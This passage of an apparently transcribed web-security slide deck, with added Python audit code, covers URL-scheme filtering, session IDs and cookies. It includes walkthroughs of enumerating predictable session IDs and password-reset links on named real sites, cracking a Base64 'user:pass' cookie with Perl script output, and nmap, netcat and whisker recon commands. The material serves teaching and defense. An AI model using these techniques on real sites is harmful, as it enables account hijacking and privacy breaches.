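SCHEME = re.compile(r"^([a-z][a-z0-9+.-]*):")
RELATIVE = re.compile(r"^[a-z0-9/][a-z0-9/._~%?=&+-]*$")


def naive_denylist_blocks(value: str) -> bool:
    """The kind of filter the slides defeat: look for the literal string."""
    return "javascript:" in value.lower()


def canonical_url(value: str) -> str:
    """Undo what a browser does before it interprets the scheme: entity decoding,
    then removal of control characters and whitespace, then case folding."""
    decoded = html.unescape(value)
    stripped = "".join(ch for ch in decoded if ord(ch) > 0x20)
    return stripped.lower()


def is_allowed_url(value: str) -> bool:
    """Default deny: accept only an allowlisted absolute scheme or a plain relative path."""
    url = canonical_url(value)
    if not url:
        return False
    m = SCHEME.match(url)
    if m:
        return m.group(1) in ALLOWED_SCHEMES
    return RELATIVE.match(url) is not None


def compare(samples=SAMPLES) -> dict:
    """For each sample: (denylist blocked it?, allowlist accepted it?, expected verdict)."""
    return {v: (naive_denylist_blocks(v), is_allowed_url(v), expected)
            for v, expected in samples.items()}


def denylist_misses(samples=SAMPLES) -> list:
    """Malicious samples that the literal-string denylist lets through."""
    return [v for v, expected in samples.items()
            if not expected and not naive_denylist_blocks(v)]


if __name__ == "__main__":
    for v, (blocked, allowed, expected) in compare().items():
        print(f"{v!r:32} denylist_blocked={blocked!s:5} "
              f"allowlist_accepts={allowed!s:5} expected={expected}")
```

This checks the URL value only; the surrounding markup still needs an element and attribute allowlist (the "Dangerous HTML Tags" and "Dangerous HTML Attributes" lists are the things to refuse by default), and the value must be attribute-escaped on output. Note that the scheme rule never mentions "javascript", "livescript" or "mocha": any scheme not in the allowlist is refused.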
Web Application Logins
Traditional Brute Force
guest
Admin
123123
Password
Etc.
Session ID Overview
• HTTP is a stateless protocol
• Rather than make a user authenticate upon each click in a web application, a sense of “state” is created
• In order to maintain state, a shared string, token, or secret between HTTP client and server is usually used by developers
• Essentially, authentication data (username/password) is exchanged for a “Session ID”
Web State Attacks
• Session Replay
– A traditional replay attack in the cryptography sense is an attack in which a valid data transmission is maliciously or fraudulently repeated, either by the originator or by an adversary who intercepts the data and retransmits it.
• Session Hijacking
– Seizing control of a legitimate user's web application session while that user is “logged in” to the application
Session ID
• Session ID should IN THEORY be just as secure as username/password
Session ID Overview
• While it is generally clear that username/password pairs are indeed authentication data and therefore sensitive, it is not generally understood that session IDs are also just as sensitive because of their frequent use for authentication. See RFC 2964 (Use of HTTP State Management).
Session ID Overview
• Session IDs are commonly stored in cookies and/or URLs, and hidden fields of web pages (or some combination)
• Session ID generated by WEB SERVER (IIS, etc.) when the user first hits the site or by WEB APPLICATION (ATG dynamo, Apache Tomcat, BEA Websphere, .jsp, .asp, perl, etc.) when the user logs in
Cookie Refresher
• Sometimes the cookies are set to expire (i.e., be deleted) upon closing the browser; these are typically called “session cookies” or “non-persistent” cookies
• Persistent cookies last beyond a user’s session (i.e. “Remember Me” option)
• Persistent cookies are usually stored on the user’s hard drive in a location according to the particular operating system and browser (e.g., C:\Program files\netscape\users\username\cookies.txt for Netscape and C:\Documents and Settings\username\Cookies for IE on Win2K).
Cookie Refresher
• Cookie Refresher (RFC 2965)
1.) domain: The website domain that created and that can read the variable.
2.) flag: A TRUE/FALSE value indicating whether all machines within a given domain can access the variable.
3.) path: Pathname of the URL(s) capable of accessing the cookie from the domain.
4.) secure: A TRUE/FALSE value indicating if an SSL connection with the domain is needed to access the variable.
5.) expiration: The Unix time that the variable will expire on. Unix time is defined as the number of seconds since 00:00:00 GMT on Jan 1, 1970. Omitting the expiration date signals to the browser to store the cookie only in memory; it will be erased when the browser is closed. (In the example below, 1154029490 expires July 27, 2006.)
6.) name: The name of the Session ID variable (in this case Apache).
7.) value: The value of the Session ID variable (in this case 64.3.40.151.16018996349247480).
Example cookies.txt line:
www.redhat.com FALSE / FALSE 1154029490 Apache 64.3.40.151.16018996349247480
Field by field: (1) www.redhat.com (2) FALSE (3) / (4) FALSE (5) 1154029490 (6) Apache (7) 64.3.40.151.16018996349247480
Cookie Stored Session ID Examples
.www.ibm.com TRUE /rc FALSE 1293768100 sauidp p0010000000006DCC10255298230000591992.003F75FEF2
.yahoo.com TRUE / FALSE 1271361612 B 3qpaarsu48dai&b=2
.amazon.com FALSE / FALSE 1026115299 session-id 103-1456769-7895034
.ebay.com TRUE / FALSE 1183296824 lucky8 694036
.starwars.com TRUE / FALSE 1341753778 Wookie-Cookie 13fe8fff4799f27dcf19c959dafa8437
.yahoo.com TRUE / FALSE 1154029490 I ir=9p&in=4aweec66&i1=AFABCl
.yahoo.com TRUE / FALSE 1154029490 PU t=1
URL Stored Session ID
• http://www.123greetings.com/view/7AD30725122120803
• http://evite.citysearch.com/r?iid=KVIJBUFDLPVMIVLXYUKB
• http://view.greetings.yahoo.com/greet/view?FXA96K95JAEJS
• http://www.atg.com/en/index.jhtml;jsessionid=HYMJK3PJUSJ4CCQCQBJCGWQKAKAFUIV0?_requestid=21122
• http://www.amazon.com/exec/obidos/subst/home/home.html/102-4524380-3923344
Session IDs in HTML Hidden Fields
<FORM METHOD=POST ACTION="/cgi-bin/bankonline.cgi">
<input type="hidden" name="sessionID" value="abcde1234">
<input type="hidden" name="useraccount" value="673-12745">
<input type="submit" name="Access My Bank Information"></form>
Session ID Security Overview
Session ID security is a microcosm of Web Application Security.
Web Application Security cuts through many different aspects of an organization’s information security infrastructure.
An Example: Brute Forcing Session ID’s in URLS
Dear Terry Gillette, An Anonymous Admirer has sent you a greeting card from 123Greetings.com, a FREE service committed to keep people in touch. To see your greeting card, choose from any of the following options which works best for you. --------Method 1-------- Just click on the following Internet address (if that doesn't work for you, copy & paste the address onto your browser's address box.)
http://www30.123greetings.com/card/08/01/05/20/BG20801052002282.html
An Example: Brute Forcing Session ID’s in URLS
http://www.123greetings.com/view/AD30725122116211
http://www.123greetings.com/view/AD30725122118909
http://www.123greetings.com/view/AD30725122120803
http://www.123greetings.com/view/AD30725122122507
http://www.123greetings.com/view/AD30725122124100
Once we recognise that the date we sent these electronic cards on was July 25 at 12:21 PST, we can eliminate some more entropy from this session ID (07251221). Notice then that we’re left with five incrementing “random” digits at the end of the URL.
An Example: Brute Forcing Session ID’s in URLS
AUTOMATED DEMO!
Why Brute Forcing Web Session ID’s is Bad
• Can result in an online user’s web application account being hijacked or loss of privacy
• Easy to exploit
• Unlike typical login scenario, no failed login lockout
• Prevalent disclosure among security mailing lists
• Typical security solutions (firewalls, IDS, etc.) do nothing to detect attacks
• Log data is usually not that detailed
• IDS is not well developed for Web Application attacks
• SSL (Server side) does nothing to protect against these attacks
In the News
– “Privacy hole found in Verizon Wireless Web site” Computerworld, Sept 6, 2001.
http://www.computerworld.com/securitytopics/security/privacy/story/0,10801,63587,00.html
http://online.securityfocus.com/archive/1/211520
– https://www.app.airtouch.com/jstage/plsql/ec_navigation_wrapper.nav_frame_display?p_session_id=3346178&p_host=ACTION
URL Example: Brute Forcing Register.com
Thank you for using register.com's Domain Manager. To change or re-enter your password, please copy and paste the URL below into the "Location" or "Address" field of your web browser and hit the 'Enter' key on your keyboard. Note: If your e-mail program supports HTML, you may be able to click on the link below. http://mydomain.register.com/change_password.cgi?155218782787 Note: Above link will expire within three days
Example 2: Brute Forcing Web Session ID’s
http://mydomain.register.com/change_password.cgi?486218782865
http://mydomain.register.com/change_password.cgi?440218782891
http://mydomain.register.com/change_password.cgi?685218782917
http://mydomain.register.com/change_password.cgi?505218782956
http://mydomain.register.com/change_password.cgi?435218782969
URL Example – Brute Forcing Dfilm.com
-----Original Message-----
From: [email protected] [mailto:[email protected]]
Sent: Monday, July 01, 2002 1:38 PM
Subject: D.FILM Digital Movie for Dave
Dave created a digital movie for you!
You can view it at the following URL:
http://mm.dfilm.com/mm2s/mm_route.php?id=110532
Cheers,
Dave and DFILM.
Be sure to check out the web site at http://www.dfilm.com
URL Example – Brute Forcing Dfilm.com
No privacy of other users’ creations:
http://mm.dfilm.com/mm2s/mm_route.php?id=110532
http://mm.dfilm.com/mm2s/mm_route.php?id=110531
http://mm.dfilm.com/mm2s/mm_route.php?id=110530
http://mm.dfilm.com/mm2s/mm_route.php?id=110529
http://mm.dfilm.com/mm2s/mm_route.php?id=110528
http://mm.dfilm.com/mm2s/mm_route.php?id=110527
http://mm.dfilm.com/mm2s/mm_route.php?id=110526
http://mm.dfilm.com/mm2s/mm_route.php?id=…
URL Example – Sendomatic.com
http://www.sendomatic.com/servlets/servlets/mysendo?uId=76330
URL Example – Sendomatic.com
View other people’s events. Crash a party, edit an event, cancel an event, etc.
http://www.sendomatic.com/servlets/servlets/mysendo?uId=76330
http://www.sendomatic.com/servlets/servlets/mysendo?uId=76331
http://www.sendomatic.com/servlets/servlets/mysendo?uId=76332
http://www.sendomatic.com/servlets/servlets/mysendo?uId=76333
http://www.sendomatic.com/servlets/servlets/mysendo?uId=76334
http://www.sendomatic.com/servlets/servlets/mysendo?uId=76335
http://www.sendomatic.com/servlets/servlets/mysendo?uId=76336
http://www.sendomatic.com/servlets/servlets/mysendo?uId=…
Cookie Example – Freeservers.com
Cookie Example – Freeservers.com
• LOGIN=dGVzdGluZzEyMy5pdGdvLmNvbToxMjMxMjM0;
• Base64 decode the string: http://www.securitystats.com/tools/base64.asp
testing123.itgo.com:1231234 (username:password)
• Next, automate it with a Perl exploit by feeding encoded strings into the cookie
Cookie Example – Freeservers.com
% perl freeservershack.pl
trying test
trying test123
trying 123123
trying 1231234
Cracked it! The password to testing123.itgo.com is 1231234
GET http://testing123.itgo.com/cgi-bin/util/my_member_area
User-Agent: Mozilla/4.75 [en] (Windows NT 5.0; U)
Cookie: LOGIN=dGVzdGluZzEyMy5pdGdvLmNvbToxMjMxMjM%3D
Cookie2: $Version=1
%
Cookie Example – Freeservers.com
• Or a much longer way: use the brute forcer on every single cookie character combination
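The Cookie Refresher slide describes the seven-field cookies.txt format, and the Freeservers example shows a cookie whose value is nothing more than Base64 of "username:password". Both are things an auditor can check mechanically: parse the file, flag session cookies that are sent without the secure flag or that persist for a long time, and flag values that decode to credential-shaped text. The following is an added example written for this page, not code from the deck; the sample file is constructed (tab separated, re-typed from the slides' own example values), and the fixed "current time" and the 30-day threshold are assumptions.

```python
import base64
import binascii
import re
import urllib.parse

# Constructed cookies.txt content in the Netscape format the refresher slide describes,
# re-typed from the deck's own example values; not a captured file.
SAMPLE_COOKIES_TXT = (
    "# Netscape HTTP Cookie File\n"
    "www.redhat.com\tFALSE\t/\tFALSE\t1154029490\tApache\t64.3.40.151.16018996349247480\n"
    ".ebay.com\tTRUE\t/\tFALSE\t1183296824\tlucky8\t694036\n"
    "testing123.itgo.com\tFALSE\t/\tTRUE\t0\tLOGIN\tdGVzdGluZzEyMy5pdGdvLmNvbToxMjMxMjM0\n"
)
NOW = 1_000_000_000        # assumption: fixed "current time" so the results are reproducible
LONG_LIVED = 30 * 86400    # assumption: a session cookie valid beyond 30 days is flagged

FIELDS = ("domain", "flag", "path", "secure", "expires", "name", "value")
CREDENTIAL_SHAPE = re.compile(r"^[\x21-\x7e]{1,64}:[\x21-\x7e]{1,64}$")   # looks like user:pass


def parse_cookie_line(line: str) -> dict:
    """Split one cookies.txt line into the seven fields numbered on the slide."""
    parts = line.rstrip("\n").split("\t")
    if len(parts) != 7:
        raise ValueError(f"expected 7 tab-separated fields, got {len(parts)}")
    cookie = dict(zip(FIELDS, parts))
    cookie["flag"] = cookie["flag"] == "TRUE"
    cookie["secure"] = cookie["secure"] == "TRUE"
    cookie["expires"] = int(cookie["expires"])
    return cookie


def decodes_to_credentials(value: str):
    """Return the decoded text if the value is Base64 of something shaped like user:pass."""
    text = urllib.parse.unquote(value)   # the captured request carried %3D for '='
    try:
        raw = base64.b64decode(text + "=" * (-len(text) % 4), validate=True)
        decoded = raw.decode("ascii")
    except (binascii.Error, UnicodeDecodeError):   # not Base64, or not printable text
        return None
    return decoded if CREDENTIAL_SHAPE.match(decoded) else None


def audit_cookies(text: str, now: int = NOW) -> dict:
    """Map cookie name -> list of findings for every non-comment line."""
    findings = {}
    for line in text.splitlines():
        if not line or line.startswith("#"):
            continue
        c = parse_cookie_line(line)
        issues = []
        if not c["secure"]:
            issues.append("no Secure flag: sent in the clear over HTTP")
        if c["expires"] and c["expires"] - now > LONG_LIVED:
            issues.append("persistent cookie: survives browser close")
        cred = decodes_to_credentials(c["value"])
        if cred:
            issues.append(f"value decodes to credentials {cred!r}")
        findings[c["name"]] = issues
    return findings


if __name__ == "__main__":
    for name, issues in audit_cookies(SAMPLE_COOKIES_TXT).items():
        print(name, issues or ["ok"])
```

The credential check is a heuristic (Base64 that decodes to printable text with a single colon), so it will also fire on harmless values of that shape; treat its output as something to inspect, not as proof. The point it makes for the Freeservers case is that the cookie is a reversible encoding of the password, not a session identifier at all.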
Cookie/URL Example – Amazon.com
• Some sites use the URL AND Cookie for authentication:
6 Common Problems
• Weak Algorithm – Many of the most popular web sites today are currently using linear algorithms based on easily predictable variables such as time or IP address.
• No Form of Account Lockout – With regard to Session ID brute force attacks, an attacker can probably try hundreds or thousands of Session IDs embedded in a legitimate URL without a single complaint from the web server.
• Short Key Space – Even the most cryptographically strong algorithm still allows an active Session ID to be easily determined if the size of the string’s key space is not sufficiently large.
6 Common Problems – Continued6 Common Problems – Continued
• Indefinite Expiration on Server– Session IDs that do not expire on the web server can allow an attacker unlimited time to guess a valid Session ID.
• Transmitted in the Clear – Assuming SSL is not being used while the Session ID cookie is transmitted to and from the browser, the Session ID could be sniffed across a flat network taking the guess-work away for a miscreant. This is still a problem with proxy servers.
• Insecure Retrieval – By tricking the user’s browser into visiting another site, an attacker can retrieve stored Session ID information and quickly exploit this information before the user’s sessions expire. This can be done a number of ways: DNS poisoning, Cross-site Scripting, etc.
Tools
• Session Auditor – www.idefense.com/idtools/Session_Auditor.zip
• Visual Testing – WebSleuth – www.geocities.com/dzzie/sleuth
• WebProxy – www.atstake.com/research/tools/index.html
• HTTPush – httpush.sourceforge.net
• Achilles – www.digizen-security.com/downloads.html
• MiniBrowser – aignes.com/download.htm
Why Automated Tools Don’t Work Very Well
• Some good things:
– Completeness
– Large knowledge bases (at least possibly)
• Puts Web security assessment into the hands of anyone who calls themselves an “Information Security Expert”.
Why Automated Tools Don’t Work Very Well
• Every programmer does things a little differently
• Authentication schemes are hard to automate
• Error codes are not standardized
• Sometimes simple things like SSL get in the way
Why People are Better
• Recognition of subtle errors
• We understand the impact and therefore the risk of a vulnerability
• We are grounded in the fundamentals of Computer Science and therefore are able to find “real” bugs, flaws in logic
Web Hacking Accessories
• Some helpful tools include…
– A port scanner (Nmap et al.) – www.insecure.org/nmap/
– Netcat, the network Swiss Army knife – http://www.atstake.com/research/tools/network_utilities/
– A vulnerability scanner: Whisker – http://www.wiretrip.net/rfp/p/doc.asp/i3/d21.htm
– OpenSSL source and documentation – OpenSSL, RFC 2246
New tools on the horizon…
• Nikto – CGI scanner, similar to whisker 1.4. Checks for CGIs, common dirs, and old versions. Database frequently updated. http://www.cirt.net/
• WHArsenal – Set of CGIs that plug into an existing Apache install. Allows for all kinds of requests, while controlling/modifying request particulars. http://community.whitehatsec.com/
• @stake WebProxy – Assessment proxy with full fuzzer/rewriting capabilities. Implemented in Java; supports Linux, Solaris, and Windows. http://www.atstake.com/
• Nessus – Has a few new interesting web assessment plugins which do site crawling/mirroring and a few other interesting things. http://www.nessus.org/
Basic Training for Web Combat…
• Port scanning – Look for well-known TCP web ports.
• 80, 81, 443, 8000, 8080, etc…
• Using FScan (from Foundstone):
  fscan -p 80,81,443,8000,8080 10.0.0.1
• Using nmap (by Fyodor):
  nmap -p 80,81,443,8000,8080 10.0.0.1
Basic Training for Web Combat…
• Fingerprinting – HTTP Banner grabbing.
– netcat as a TCP client (even telnet works):
  nc 10.0.0.1 80
  HEAD / HTTP/1.0
• Advanced HTTP methods: TRACE, OPTIONS, etc.
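The port-scan and banner-grabbing steps of the two slides above, as an added Python example (not from the slides) written from the inventory side: check the well-known web ports, send the same HEAD or OPTIONS request netcat would, and pull out the Server, X-Powered-By and Allow headers that reveal version and enabled methods. The sample response is constructed; the host and timeout are assumptions.

```python
import socket

WEB_PORTS = [80, 81, 443, 8000, 8080]   # the well-known web ports from the slide

def parse_banner(raw):
    """Pull the fingerprint-relevant fields out of a raw HTTP response head."""
    head = raw.split(b"\r\n\r\n", 1)[0].decode("latin-1", "replace")
    lines = head.split("\r\n")
    info = {"status": lines[0], "server": None, "powered_by": None, "allow": []}
    for line in lines[1:]:
        name, _, value = line.partition(":")
        name, value = name.strip().lower(), value.strip()
        if name == "server":
            info["server"] = value
        elif name == "x-powered-by":
            info["powered_by"] = value
        elif name == "allow":   # answered to OPTIONS: which methods the server enables
            info["allow"] = [m.strip().upper() for m in value.split(",") if m.strip()]
    return info

def risky_methods(info):
    """Methods a production server should not advertise (TRACE enables cross-site tracing)."""
    return [m for m in info["allow"] if m in ("TRACE", "PUT", "DELETE")]

def grab_banner(host, port, method="HEAD", timeout=3.0):
    """Connect (the port-scan step) and send one request (the banner step).
    Returns None when the port is closed or filtered. Plain TCP only: port 443
    needs TLS in front, which is what the proxy-over-SSL slide below sets up."""
    request = f"{method} / HTTP/1.0\r\nHost: {host}\r\n\r\n".encode()
    chunks = []
    try:
        with socket.create_connection((host, port), timeout=timeout) as sock:
            sock.sendall(request)
            while b"\r\n\r\n" not in b"".join(chunks):
                data = sock.recv(4096)
                if not data:
                    break
                chunks.append(data)
    except OSError:
        return None
    return parse_banner(b"".join(chunks))

def inventory(host, ports=WEB_PORTS):
    """Banner for every open web port on host; closed ports are omitted."""
    return {p: b for p in ports if (b := grab_banner(host, p)) is not None}

# Constructed sample response so the parser can be exercised without a network.
SAMPLE_RESPONSE = (b"HTTP/1.1 200 OK\r\nServer: Apache/1.3.26 (Unix)\r\n"
                   b"X-Powered-By: PHP/4.2.2\r\nAllow: GET, HEAD, POST, TRACE, OPTIONS\r\n\r\n")
```

Run `inventory("10.0.0.1")` against a host you administer to see which ports answer and which of them still leak a full version string or accept TRACE.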
Basic Training for Web Combat…
Shaking the tree for the low-hanging fruit…
• Scan using a database of known web vulnerabilities.
• Whisker (by Rain Forest Puppy):
  ./whisker.pl -h 10.0.0.1 -I 1
• cgichk.c:
  <snip>
  "GET /cgi-bin/phf HTTP/1.0\n\n";
  "GET /cgi-bin/Count.cgi HTTP/1.0\n\n";
  "GET /cgi-bin/test-cgi HTTP/1.0\n\n";
  "GET /cgi-bin/php.cgi HTTP/1.0\n\n";
• ISS, Cybercop, Retina, etc.
el33t hax0r Training for Web Combat…
What about SSL?
• Some SSL Myths:
– “We are secure because we use SSL!”
– “Strong 128 bit crypto being used”
– “We use Digital Certificates signed by VeriSign”
Proxy Over SSL
• Using netcat and OpenSSL, it is possible to create a simple two-line SSL Proxy!
• Listen on port 80 on a host and redirect requests to port 443 on a remote host through SSL.
[Diagram: Web client → nc → openssl → SSL web server]
Assessment Tools
• Vulnerability scanners
– Look for a known list of vulnerable applications or technologies
– Do not (can not) engage/scan custom applications and configurations
– General vulnerability scanners: ISS, Cybercop, Nessus
– Web-specific vulnerability scanners: WebInspect, whisker
Assessment Tools
• ‘Proxy monitors’
– HTTP proxy which monitors traffic, looking for web vulnerabilities as they pass
– Can analyze custom applications with the help of a user
– Examples: AppScan, RFProxy, HTTPush, Achilles
Root Causes of Web Hacks
• Complex web architectures may cause oversight in web server configuration.
• URL Parsing.
• File Canonicalization.
• Combination of underlying operating system and web server may leave holes.
Root Causes of Web Hacks
• Untested code used in web applications, to save time.
• Level of security consciousness low in web application developers.
• Security vs. convenience.
• Security vs. time-to-market.
• Zero knowledge administration breeds zero knowledge administrators.